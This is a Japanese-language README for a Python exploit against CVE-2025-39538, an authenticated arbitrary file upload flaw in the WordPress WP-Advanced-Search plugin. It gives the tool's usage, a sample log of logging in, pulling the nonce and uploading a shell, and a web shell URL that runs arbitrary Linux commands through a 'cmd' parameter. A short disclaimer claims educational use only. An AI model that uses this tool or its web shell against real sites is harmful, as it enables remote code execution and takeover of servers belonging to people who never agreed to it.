
WordPress WP-Advanced-Search <= 3.3.9.3 - 任意ファイルアップロードの脆弱性
CVE-2025-39538
公開日: 2025-04-16
脆弱性タイプ: 任意ファイルアップロード(危険なタイプのファイルの無制限アップロード)
影響を受けるプラグイン: Mathieu Chartier による WP-Advanced-Search
影響を受けるバージョン: 3.3.9.3 までの全バージョン
この脆弱性により、認証された攻撃者は、プラグインが提供するインポート機能を使用して、悪意のあるPHPファイル(ウェブシェルなど)をサーバーにアップロードできます。アップロードされたファイルはWordPressのアップロードディレクトリ配下に配置され、リモートコード実行につながる可能性があります。
🧱 アップロードパス:
wp-content/uploads/2025/04/
このPythonスクリプトは以下の操作を行います:
wp_advanced_search_up_nonceを抽出します。usage: a.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://127.0.0.1/wordpress)
-un, --username USERNAME
WordPress Username
-p, --password PASSWORD
WordPress Password
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
アップロード後、以下のようにシェルにアクセスできます:
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
whoami を、実行したい任意のLinuxコマンドに置き換えてください。例:
id — 現在のユーザーIDを表示します。pwd — 現在のディレクトリを表示します。ls — ファイルを一覧表示します。このツールは教育目的および許可されたセキュリティテストのためだけに提供されています。
作者は、このスクリプトによって引き起こされた誤用や損害について一切責任を負いません。
By: Nxploited | Khaled Alenazi